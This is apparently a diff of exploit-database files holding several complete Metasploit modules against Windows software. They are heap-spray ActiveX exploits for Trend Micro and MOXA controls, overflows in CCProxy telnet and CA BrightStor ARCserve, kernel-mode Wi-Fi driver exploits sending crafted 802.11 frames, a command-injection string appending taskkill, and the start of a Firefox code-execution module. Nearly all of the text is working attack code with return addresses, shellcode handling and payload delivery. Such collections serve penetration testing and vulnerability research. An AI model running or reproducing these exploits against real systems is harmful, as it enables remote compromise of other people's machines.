var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
}
</script>
<object classid='clsid:#{clsid}' id='#{ienipp}'>
<param name='operation' value='op-client-interface-version' />
<param name='result-type' value='url' />
<param name='call-back-url' value='#{ret}' />
</object>
</html>|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end

147
platforms/windows/remote/16596.rb
View file

@ -1,147 +0,0 @@
##
# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# trendmicro_extsetowner.rb
#
# Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows XP SP3
# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows Vista SP2
#
# UfPBCtrl.dll version tested:
# File Version: 17.50.0.1366
# ClassID: 15DBC3F9-9F0A-472E-8061-043D9CEC52F0
# RegKey Safe for Script: True
# RegKey Safe for Init: True
# KillBitSet: False
#
# References:
# - CVE-2010-3189
# - OSVDB 67561
# - http://www.zerodayinitiative.com/advisories/ZDI-10-165/ - Original advisory by Andrea Micalizzi aka rgod via Zero Day Initiative
# - http://www.exploit-db.com/exploits/14878/ - MOAUB #03 exploit
# - http://www.exploit-db.com/trend-micro-internet-security-pro-2010-activex-extsetowner-remote-code-execution/ - MOAUB #03 binary analysis
# - http://www.rec-sec.com/2010/09/28/trend-micro-internet-security-2010-rce-exploit/ - Metasploit exploit by Trancer, Recognize-Security
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in Trend Micro
Internet Security Pro 2010 ActiveX.
When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Version' => '$Revision: 10538 $',
'References' =>
[
[ 'CVE', '2010-3189' ],
[ 'OSVDB', '67561'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-165/' ], # Andrea Micalizzi aka rgod via Zero Day Initiative
[ 'URL', 'http://www.exploit-db.com/exploits/14878/' ], # MOAUB #03
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #??
],
'DisclosureDate' => 'Aug 25 2010',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape(make_nops(4))
ret = Rex::Text.to_unescape([target.ret].pack('V'))
blocksize = 0x40000
fillto = 500
# ActiveX parameters
clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0"
# Randomize the javascript variable names
ufpbctrl = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_ret = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
html = %Q|<html>
<object classid='clsid:#{clsid}' id='#{ufpbctrl}'></object>
<script>
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape('#{nops}');
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
}
#{ufpbctrl}.extSetOwner(unescape('#{ret}'));
</script>
</html>|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end

140
platforms/windows/remote/16685.rb
View file

@ -1,85 +1,79 @@
##
# $Id: moxa_mediadbplayback.rb 10914 2010-11-05 02:58:01Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10914 $',
'References' =>
[
[ 'OSVDB', '68986'],
[ 'URL', 'http://www.moxa.com' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
],
'DisclosureDate' => 'Oct 19 2010',
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2010-4742' ],
[ 'OSVDB', '68986'],
[ 'URL', 'http://www.moxa.com' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
],
'DisclosureDate' => 'Oct 19 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
content = %Q|
<html>
<object id ='#{vname}' classid='clsid:5B32067A-121B-49DE-8182-91EB13DDF8D6'></object>
<script language ="javascript">
@ -98,11 +92,11 @@ for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescap
#{vname}.PlayFileName = #{rand8};
</script>
</html>
|
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
file_create(content)
end
end
end

87
platforms/windows/remote/16689.rb
View file

@ -1,87 +0,0 @@
##
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
'Description' => %q{
This module exploits the YoungZSoft CCProxy <= v6.2 suite
Telnet service. The stack is overwritten when sending an overly
long address to the 'ping' command.
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666 ' ],
[ 'URL', 'http://milw0rm.com/exploits/621' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1012,
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
],
'DisclosureDate' => 'Nov 11 2004'))
register_options(
[
Opt::RPORT(23),
], self.class)
end
def check
connect
banner = sock.get_once(-1,3)
disconnect
if (banner =~ /CCProxy Telnet Service Ready/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
sock.put(sploit + "\r\n")
handler
disconnect
end
end

140
platforms/windows/remote/2770.rb
View file

@ -1,81 +1,90 @@
##
# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking
class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
include Exploit::Lorcon
include Exploit::KernelMode
include Msf::Exploit::Lorcon2
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow',
'Description' => %q{
This module exploits a stack overflow in the Broadcom Wireless driver
that allows remote code execution in kernel mode by sending a 802.11 probe
response that contains a long SSID. The target MAC address must
be provided to use this exploit. The two cards tested fell into the
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
This module exploits a stack buffer overflow in the Broadcom Wireless driver
that allows remote code execution in kernel mode by sending a 802.11 probe
response that contains a long SSID. The target MAC address must
be provided to use this exploit. The two cards tested fell into the
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Authors' =>
'Author' =>
[
'Chris Eagle', # initial discovery
'Johnny Cache <johnnycsh [at] 802.11mercenary.com>', # the man with the plan
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>', # the man with the plan
'skape', # windows kernel ninjitsu and debugging
'hdm' # porting the C version to ruby
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3583 $',
'Version' => '$Revision: 9669 $',
'References' =>
[
['CVE', '2006-5882'],
['OSVDB', '30294'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
{
'Ret' => 0x8066662c, # jmp edi
'Platform' => 'win',
'Payload' =>
'Payload' =>
{
'ExtendedOptions' =>
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
}
],
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
{
'Ret' => 0x804f16eb, # jmp edi
'Platform' => 'win',
'Payload' =>
'Payload' =>
{
'ExtendedOptions' =>
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
@ -83,13 +92,13 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
'KiIdleLoopAddress' => 0x804dc0c7,
}
}
}
]
}
]
],
'DefaultTarget' => 0
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 11 2006'
))
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
@ -99,102 +108,99 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
def exploit
open_wifi
stime = Time.now.to_i
print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
select(nil, nil, nil, 0.02)
wifi.write(create_response)
select(nil, nil, nil, 0.01)
wifi.write(create_beacon)
break if session_created?
end
print_status("Finished sending frames...")
end
def create_beacon
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
dst = eton('FF:FF:FF:FF:FF:FF')
seq = [Time.now.to_i % 4096].pack('n')
blob = create_frame
blob[0,1] = 0x80.chr
blob[4,6] = dst
blob[10,6] = src
blob[16,6] = src
blob[22,2] = seq
blob
end
def create_response
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
dst = eton(datastore['ADDR_DST'])
seq = [Time.now.to_i % 256].pack('n')
blob = create_frame
blob[0,1] = 0x50.chr
blob[0,1] = 0x50.chr
blob[4,6] = dst
blob[10,6] = src
blob[16,6] = src # bssid field, good idea to set to src.
blob[16,6] = src # bssid field, good idea to set to src.
blob[22,2] = seq
blob
end
def create_frame
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
"\x58\x58\x58\x58\x58\x58" + # src
"\x58\x58\x58\x58\x58\x58" + # bssid
"\x70\xed" + # sequence number
#
# fixed parameters
#
# timestamp value
Rex::Text.rand_text_alphanumeric(8) +
rand_text_alphanumeric(8) +
"\x64\x00" + # beacon interval
"\x11\x04" + # capability flags
#
# tagged parameters
#
# ssid tag
"\x00" + # tag: SSID parameter set
"\x5d" + # len: length is 93 bytes
# jump into the payload
"\x89\xf9" + # mov edi, ecx
"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
"\xff\xe1" + # jmp ecx
# padding
Rex::Text.rand_text_alphanumeric(79) +
rand_text_alphanumeric(79) +
# return address
[target.ret].pack('V') +
# vendor specific tag
"\xdd" + # wpa
"\xff" + # big as we can make it
# the kernel-mode stager
payload.encoded
end
end
end
# milw0rm.com [2006-11-13]
end

157
platforms/windows/remote/2771.rb
View file

@ -1,57 +1,72 @@
##
# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking
class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote
include Exploit::Lorcon
include Exploit::KernelMode
include Msf::Exploit::Lorcon2
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
'Description' => %q{
This module exploits a stack overflow in the A5AGU.SYS driver provided
with the D-Link DWL-G132 USB wireless adapter. This stack overflow
allows remote code execution in kernel mode. The stack overflow is triggered
when a 802.11 Beacon frame is received that contains a long Rates information
element. This exploit was tested with version 1.0.1.41 of the
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
adapter and appear to resolve this flaw, but D-Link does not offer an updated
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
all cards within range of the attack will be affected. The tested adapter used
a MAC address in the range of 00:11:95:f2:XX:XX.
Vulnerable clients will need to have their card in a non-associated state
for this exploit to work. The easiest way to reproduce this bug is by starting
the exploit and then accessing the Windows wireless network browser and
forcing it to refresh.
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
database indicates that D-Link has not provided an official patch or
solution for any of the seven flaws listed at the time of writing:
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided
with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow
allows remote code execution in kernel mode. The stack buffer overflow is triggered
when a 802.11 Beacon frame is received that contains a long Rates information
element. This exploit was tested with version 1.0.1.41 of the
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
adapter and appear to resolve this flaw, but D-Link does not offer an updated
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
all cards within range of the attack will be affected. The tested adapter used
a MAC address in the range of 00:11:95:f2:XX:XX.
Vulnerable clients will need to have their card in a non-associated state
for this exploit to work. The easiest way to reproduce this bug is by starting
the exploit and then accessing the Windows wireless network browser and
forcing it to refresh.
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
database indicates that D-Link has not provided an official patch or
solution for any of the seven flaws listed at the time of writing:
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
DWL-G132 driver (v1.21).
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Authors' =>
'Author' =>
[
'hdm', # discovery, exploit dev
'skape', # windows kernel ninjitsu
'Johnny Cache <johnnycsh [at] 80211mercenary.net>' # making all of this possible
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>' # making all of this possible
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3583 $',
'Version' => '$Revision: 9670 $',
'References' =>
[
['CVE', '2006-6055'],
['OSVDB', '30296'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
@ -63,7 +78,7 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
'Space' => 1000
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
# Windows XP SP2 with the latest updates
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
@ -71,9 +86,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
{
'Ret' => 0x8066662c, # jmp edi
'Platform' => 'win',
'Payload' =>
'Payload' =>
{
'ExtendedOptions' =>
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
@ -81,18 +96,18 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
}
],
# Windows XP SP2 install media, no patches
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
{
'Ret' => 0x804f16eb, # jmp edi
'Platform' => 'win',
'Payload' =>
'Payload' =>
{
'ExtendedOptions' =>
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
@ -100,72 +115,73 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
'KiIdleLoopAddress' => 0x804dc0c7,
}
}
}
]
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 13 2006'))
'DefaultTarget' => 0
))
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
], self.class)
end
def exploit
open_wifi
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
while (stime + rtime > Time.now.to_i)
wifi.write(create_beacon)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
# Exit if we get a session
break if session_created?
end
print_status("Completed sending beacons.")
end
#
# The following research was provided by Gil Dabah of ZERT
#
# The long rates field bug can be triggered three different ways (at least):
# 1) Send a single rates IE with valid rates up front and long data
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
#
def create_beacon
ssid = Rex::Text.rand_text_alphanumeric(6)
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
ssid = rand_text_alphanumeric(6)
bssid = ("\x00" * 2) + rand_text(4)
src = ("\x90" * 4) + "\xeb\x2b"
seq = [rand(255)].pack('n')
buff = Rex::Text.rand_text(75)
buff = rand_text(75)
buff[0, 2] = "\xeb\x49"
buff[71, 4] = [target.ret].pack('V')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
src + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
bssid + # bssid
seq + # seq
rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x00\x05" + # capability flags
# ssid tag
"\x00" + ssid.length.chr + ssid +
@ -176,14 +192,11 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
"\x03" + "\x01" + channel.chr +
# eip was his name-o
"\x01" + buff.length.chr + buff +
"\x01" + buff.length.chr + buff +
payload.encoded
return frame
end
end
end
# milw0rm.com [2006-11-13]

6
platforms/windows/remote/28188.rb
View file

@ -128,9 +128,9 @@ class Metasploit3 < Msf::Exploit::Remote
# due to the fake activation). But this line also will kill other cscript
# legit processes which could be running on the target host. Because of it
# the exploit has a Manual ranking
command = "&#x22;127.0.0.1 &#x26;&#x26; "
command << cmd.gsub(/&/, "&#x26;")
command << " &#x26;&#x26; taskkill /F /IM cscript.exe &#x22;"
command = ""127.0.0.1 && "
command << cmd.gsub(/&/, "&")
command << " && taskkill /F /IM cscript.exe ""
res = send_soap_request("OPCACTIVATE", "omHost", command)

92
platforms/windows/remote/28480.rb
View file

@ -1,92 +0,0 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::DCERPC
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '68330'],
[ 'URL', 'http://www.metasploit.com/users/mc' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
],
'DisclosureDate' => 'Oct 4 2010',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(6502) ], self.class)
end
def exploit
connect
handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
dcerpc.call(0x2B, request)
sploit = NDR.long(4)
sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
print_status("Trying target #{target.name}...")
begin
dcerpc_call(0x8A, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end
=begin
/* opcode: 0x8A, address: 0x100707D0 */
long sub_100707D0 (
[in] handle_t arg_1,
[in] long arg_2,
[in][ref][string] char * arg_3
);
=end

116
platforms/windows/remote/30474.rb
View file

@ -1,116 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
include Msf::Exploit::Remote::FirefoxAddonGenerator
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
'Description' => %q{
On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
invalid input, would throw an exception that did not have an __exposedProps__
property set. By re-setting this property on the exception object's prototype,
the chrome-based defineProperty method is made available.
With the defineProperty method, functions belonging to window and document can be
overriden with a function that gets called from chrome-privileged context. From here,
